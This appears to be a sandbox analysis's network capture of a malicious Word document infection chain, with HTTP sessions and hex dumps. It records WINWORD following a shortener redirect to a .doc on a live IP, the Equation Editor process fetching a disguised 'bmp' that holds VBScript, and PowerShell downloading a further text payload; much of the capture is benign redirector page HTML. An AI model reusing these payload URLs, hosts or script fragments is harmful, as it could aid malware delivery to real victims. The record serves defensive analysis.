                                May 28, 2024 09:30:03.646586895 CEST1236INData Raw: 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72
                                Data Ascii: ce {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exg.woff) format('woff');}@fo
                                May 28, 2024 09:30:03.646601915 CEST1236INData Raw: 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a
                                Data Ascii: t-face {font-family: 'Open Sans';font-style: normal;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVQ.woff) format('woff');}@f
                                May 28, 2024 09:30:03.646617889 CEST1236INData Raw: 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 33 3b 20 72 76 3a 33 39 2e 30 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 31 30 31 20 46 69 72 65 66 6f 78 2f 33 39 2e 30 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f
                                Data Ascii: Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126M
                                May 28, 2024 09:30:03.646635056 CEST776INData Raw: 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 30 5a 6a 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d
                                Data Ascii: aGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk0ZjWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v3
                                May 28, 2024 09:30:03.646651983 CEST1236INData Raw: 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 67 48 31 78 34 75 61 56 49 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73
                                Data Ascii: yOOSr4dVJWUgsgH1x4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 700;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj
                                May 28, 2024 09:30:03.646667957 CEST1236INData Raw: 6d 2f 73 2f 6d 6f 6e 6f 74 6f 6e 2f 76 31 35 2f 35 68 31 61 69 5a 55 72 4f 6e 67 43 69 62 65 34 54 6b 48 4c 52 41 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c
                                Data Ascii: m/s/monoton/v15/5h1aiZUrOngCibe4TkHLRA.woff) format('woff');}/* User Agent: Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;src: url(
                                May 28, 2024 09:30:03.646686077 CEST1236INData Raw: 65 77 3a 6c 61 72 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 63 61 6e 6f 6e 69 63 61 6c 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 3f 70 3d 32 38 22 3e 3c 6d 65 74 61 0a 70 72
                                Data Ascii: ew:large"><linkrel=canonical href="https://face.linksgpt.com/edge/?p=28"><metaproperty="og:locale" content="en_US"><metaproperty="og:type" content="article"><metaproperty="og:title" content="Not Found - Brandlink Edge"><metaproperty="og:u
                                May 28, 2024 09:30:03.651699066 CEST1236INData Raw: 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 22 2c 22 6e 61 6d 65 22 3a 22 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69
                                Data Ascii: ace.linksgpt.com/edge","name":"Brandlink Edge","publisher":{"@id":"https://face.linksgpt.com/edge/#person"},"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://face.linksgpt.com/edge/?p=28#webpage","url":"https://face.linksgpt.com/edge/?p=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.224916854.241.153.192802504C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:03.710764885 CEST111OUTHEAD /zBOD HTTP/1.1
                                Connection: Keep-Alive
                                User-Agent: Microsoft Office Existence Discovery
                                Host: z2.ink
                                May 28, 2024 09:30:04.318212986 CEST471INHTTP/1.1 301 Moved Permanently
                                Content-Type: text/html; charset=utf-8
                                Edge: smart-1.high-performance.network
                                Location: http://198.46.177.156/xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc
                                Date: Tue, 28 May 2024 07:29:59 GMT
                                Vary: Accept-Encoding
                                Server: LINKSGPT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Content-Length: 108
                                Connection: keep-alive
                                May 28, 2024 09:30:04.526905060 CEST471INHTTP/1.1 301 Moved Permanently
                                Content-Type: text/html; charset=utf-8
                                Edge: smart-1.high-performance.network
                                Location: http://198.46.177.156/xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc
                                Date: Tue, 28 May 2024 07:29:59 GMT
                                Vary: Accept-Encoding
                                Server: LINKSGPT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Content-Length: 108
                                Connection: keep-alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.2249169198.46.177.156802504C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:04.325973988 CEST263OUTHEAD /xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1
                                Connection: Keep-Alive
                                User-Agent: Microsoft Office Existence Discovery
                                Host: 198.46.177.156
                                May 28, 2024 09:30:04.798978090 CEST321INHTTP/1.1 200 OK
                                Date: Tue, 28 May 2024 07:30:04 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                Last-Modified: Sun, 26 May 2024 17:21:51 GMT
                                ETag: "a32e-6195ea2ebcde8"
                                Accept-Ranges: bytes
                                Content-Length: 41774
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/msword


                                Session IDSource IPSource PortDestination IPDestination Port
                                7192.168.2.224917054.241.153.19280
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:08.032121897 CEST123OUTOPTIONS / HTTP/1.1
                                Connection: Keep-Alive
                                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                translate: f
                                Host: z2.ink
                                May 28, 2024 09:30:08.625026941 CEST1236INHTTP/1.1 404 Not Found
                                Content-Type: text/html; charset=utf-8
                                Edge: smart-1.high-performance.network
                                Date: Tue, 28 May 2024 07:30:08 GMT
                                Content-Length: 102317
                                Server: LINKSGPT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Connection: keep-alive
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
                                May 28, 2024 09:30:08.625092983 CEST1236INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
                                Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;
                                May 28, 2024 09:30:08.625129938 CEST1236INData Raw: 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57
                                Data Ascii: play: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;fon
                                May 28, 2024 09:30:08.625164986 CEST1236INData Raw: 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72
                                Data Ascii: ce {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exg.woff) format('woff');}@fo
                                May 28, 2024 09:30:08.625197887 CEST1236INData Raw: 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a
                                Data Ascii: t-face {font-family: 'Open Sans';font-style: normal;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVQ.woff) format('woff');}@f
                                May 28, 2024 09:30:08.625231981 CEST1236INData Raw: 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 33 3b 20 72 76 3a 33 39 2e 30 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 31 30 31 20 46 69 72 65 66 6f 78 2f 33 39 2e 30 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f
                                Data Ascii: Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126M
                                May 28, 2024 09:30:08.625266075 CEST1236INData Raw: 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 30 5a 6a 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d
                                Data Ascii: aGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk0ZjWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v3
                                May 28, 2024 09:30:08.625299931 CEST1236INData Raw: 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 68 5a 31 78 34 75 61 56 49 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 2f
                                Data Ascii: SYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgshZ1x4uaVI.woff2) format('woff2');}/*...*/</style><style id=et-builder-googlefonts-cached-inline>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Monoton:regular&#038;subset=latin&
                                May 28, 2024 09:30:08.625333071 CEST1236INData Raw: 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74
                                Data Ascii: jqueryParams=[...jqueryParams,r],$};window.jQuery=jQuery,window.$=jQuery;let customHeadScripts=!1;jQuery.fn=jQuery.prototype={},$.fn=jQuery.prototype={},jQuery.noConflict=function(r){if(window.jQuery)return jQuery=window.jQuery,$=window.jQuer
                                May 28, 2024 09:30:08.625392914 CEST1236INData Raw: 33 3a 33 36 3a 31 38 2b 30 30 3a 30 30 22 3e 3c 6d 65 74 61 0a 70 72 6f 70 65 72 74 79 3d 22 61 72 74 69 63 6c 65 3a 70 75 62 6c 69 73 68 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 33 2d 30 37 2d 30 36 54 30 33 3a 33 34 3a 32
                                Data Ascii: 3:36:18+00:00"><metaproperty="article:published_time" content="2023-07-06T03:34:22+00:00"><metaproperty="article:modified_time" content="2023-07-06T03:36:18+00:00"><metaname="twitter:card" content="summary_large_image"><metaname="twitter:t
                                May 28, 2024 09:30:08.630321980 CEST1236INData Raw: 22 3a 22 50 65 72 73 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 61 75 74 68 6f 72 2f 74 69 61 6e 71 69 22 2c 22 6e 61 6d 65 22 3a 22 74 69 61 6e 71 69 22 2c 22 75
                                Data Ascii: ":"Person","@id":"https://face.linksgpt.com/edge/author/tianqi","name":"tianqi","url":"https://face.linksgpt.com/edge/author/tianqi","image":{"@type":"ImageObject","@id":"https://secure.gravatar.com/avatar/e10cce2f2dda5c2210772fe82fe758eb?s=96


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.224917154.241.153.192802504C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:08.727189064 CEST130OUTHEAD /zBOD HTTP/1.1
                                User-Agent: Microsoft Office Existence Discovery
                                Host: z2.ink
                                Content-Length: 0
                                Connection: Keep-Alive
                                May 28, 2024 09:30:09.333599091 CEST471INHTTP/1.1 301 Moved Permanently
                                Content-Type: text/html; charset=utf-8
                                Edge: smart-1.high-performance.network
                                Location: http://198.46.177.156/xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc
                                Date: Tue, 28 May 2024 07:30:04 GMT
                                Vary: Accept-Encoding
                                Server: LINKSGPT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Content-Length: 108
                                Connection: keep-alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.2249172198.46.177.156802504C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:09.341612101 CEST282OUTHEAD /xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1
                                User-Agent: Microsoft Office Existence Discovery
                                Host: 198.46.177.156
                                Content-Length: 0
                                Connection: Keep-Alive
                                May 28, 2024 09:30:09.831464052 CEST321INHTTP/1.1 200 OK
                                Date: Tue, 28 May 2024 07:30:09 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                Last-Modified: Sun, 26 May 2024 17:21:51 GMT
                                ETag: "a32e-6195ea2ebcde8"
                                Accept-Ranges: bytes
                                Content-Length: 41774
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/msword


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.2249173198.46.177.156803148C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:10.336913109 CEST340OUTGET /9090/lionsarekingofjungleimageshere.bmp HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 198.46.177.156
                                Connection: Keep-Alive
                                May 28, 2024 09:30:10.814903021 CEST1236INHTTP/1.1 200 OK
                                Date: Tue, 28 May 2024 07:30:10 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                Last-Modified: Sun, 26 May 2024 17:17:52 GMT
                                ETag: "267b4-6195e94b570c4"
                                Accept-Ranges: bytes
                                Content-Length: 157620
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: image/bmp
                                Data Raw: ff fe 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 57 00 4d 00 49 00 44 00 61 00 74 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 54 00 6f 00 44 00 61 00 74 00 65 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 29 00 0d 00 0a 00 0d 00 0a 00 57 00 4d 00 49 00 44 00 61 00 74 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 54 00 6f 00 44 00 61 00 74 00 65 00 20 00 3d 00 20 00 43 00 44 00 61 00 74 00 65 00 28 00 4d 00 69 00 64 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 35 00 2c 00 20 00 32 00 29 00 20 00 26 00 20 00 22 00 2f 00 22 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 4d 00 69 00 64 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 37 00 2c 00 20 00 32 00 29 00 20 00 26 00 20 00 22 00 2f 00 22 00 20 00 26 00 20 00 4c 00 65 00 66 00 74 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 34 00 29 00 20 00 5f 00 0d 00 0a 00 [TRUNCATED]
                                Data Ascii: Function WMIDateStringToDate(dtmEventDate)WMIDateStringToDate = CDate(Mid(dtmEventDate, 5, 2) & "/" & _Mid(dtmEventDate, 7, 2) & "/" & Left(dtmEventDate, 4) _& " " & Mid (dtmEventDate, 9, 2) & ":" & _Mid(dtmEventDate, 11, 2) & ":" & Mid(dtmEventDate, _13, 2))End Function'////////////////////////////////////////////////////////////////////////////////////////'/////////////////////////////////////////////////////////////////////////////
                                May 28, 2024 09:30:10.814932108 CEST1236INData Raw: 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 67 00 65 00 74 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 28 00 73 00 74 00 72 00 53 00
                                Data Ascii: ///////////Function getDescription(strSearch,cType)If foundSlUi <> True Then If cType <> "wmi" Then gl
                                May 28, 2024 09:30:10.814948082 CEST1236INData Raw: 64 00 22 00 2c 00 20 00 22 00 2f 00 64 00 74 00 6f 00 6b 00 69 00 6c 00 73 00 22 00 2c 00 20 00 5f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 22 00 2f 00 72 00 65 00 6d 00 68 00 73 00 74 00 22 00 2c 00 20 00 22 00 2f 00 73 00
                                Data Ascii: d", "/dtokils", _ "/remhst", "/stokflag", "/ctokflag", "/dcmid", "/dtokcerts", "/ckms-domain", "/dpid", "/actsub"
                                May 28, 2024 09:30:10.814955950 CEST1236INData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 64 00 6c 00 69 00 63 00 65 00 6e 00 73 00 65 00 20 00 3d 00 20 00 54 00 72 00 75 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 57 00 4d 00 49 00
                                Data Ascii: dlicense = True connectWMI encentrar,xarel,paragonar,"" 'Display licensestatus for all p
                                May 28, 2024 09:30:10.814975023 CEST1236INData Raw: 20 00 20 00 27 00 44 00 69 00 73 00 70 00 6c 00 61 00 79 00 20 00 53 00 50 00 50 00 20 00 72 00 65 00 6c 00 61 00 74 00 65 00 64 00 20 00 65 00 76 00 65 00 6e 00 74 00 73 00 3a 00 20 00 49 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 50 00 72 00 6f 00
                                Data Ascii: 'Display SPP related events: InstallProof & SLActivate If Win7 = True Then mungimento MSG_EV
                                May 28, 2024 09:30:10.814990997 CEST1236INData Raw: 63 00 61 00 73 00 22 00 2c 00 22 00 31 00 30 00 31 00 36 00 22 00 2c 00 22 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2d 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2d 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 2d 00 53 00
                                Data Ascii: cas","1016","Microsoft-Windows-Security-SPP",encentrar mungimento MSG_EVENT_1017,"sapatrancas","1017","Micros
                                May 28, 2024 09:30:10.815006971 CEST1236INData Raw: 63 00 61 00 74 00 68 00 61 00 72 00 74 00 69 00 6e 00 61 00 2c 00 22 00 22 00 2c 00 65 00 6e 00 63 00 65 00 6e 00 74 00 72 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 43 00 61 00 73 00 65 00 20 00 22 00 2f 00 70 00 75 00 73 00 65 00 72 00
                                Data Ascii: cathartina,"",encentrar Case "/puserops", "/duserops" connectWMI encentrar,xarel,paragonar,"reg" pe
                                May 28, 2024 09:30:10.815021992 CEST1236INData Raw: 4f 00 52 00 54 00 45 00 44 00 4c 00 4f 00 43 00 41 00 4c 00 20 00 26 00 20 00 76 00 62 00 43 00 72 00 20 00 26 00 20 00 63 00 61 00 74 00 68 00 61 00 72 00 74 00 69 00 6e 00 61 00 2c 00 54 00 72 00 75 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00
                                Data Ascii: ORTEDLOCAL & vbCr & cathartina,True End If quitExit() Case "/version" globalPopSuccess VER
                                May 28, 2024 09:30:10.815040112 CEST1236INData Raw: 69 00 6c 00 75 00 72 00 65 00 20 00 4d 00 53 00 47 00 5f 00 55 00 4e 00 53 00 55 00 50 00 50 00 4f 00 52 00 54 00 45 00 44 00 2c 00 54 00 72 00 75 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 45 00 6e 00 64 00 20 00 53 00
                                Data Ascii: ilure MSG_UNSUPPORTED,True End Select Select Case getCommand Case "/skms-domain",
                                May 28, 2024 09:30:10.815056086 CEST1236INData Raw: 30 00 78 00 22 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 67 00 65 00 74 00 44 00 65 00 73 00 63 00
                                Data Ascii: 0x" Then getDescription strValue,"" Else WScript.Ec
                                May 28, 2024 09:30:10.820240974 CEST1236INData Raw: 6e 00 20 00 67 00 65 00 74 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 2c 00 73 00 74 00 72 00 56 00 61 00 6c 00 75 00 65 00 2c 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00
                                Data Ascii: n getCommand,strValue,"" If getCommand = "/pstatus" And getHeartBeat = True Then


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.2249177198.46.177.156803404C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:31.038394928 CEST76OUTGET /8080/RBG.txt HTTP/1.1
                                Host: 198.46.177.156
                                Connection: Keep-Alive
                                May 28, 2024 09:30:31.517807961 CEST1236INHTTP/1.1 200 OK
                                Date: Tue, 28 May 2024 07:30:31 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                Last-Modified: Sun, 26 May 2024 16:39:15 GMT
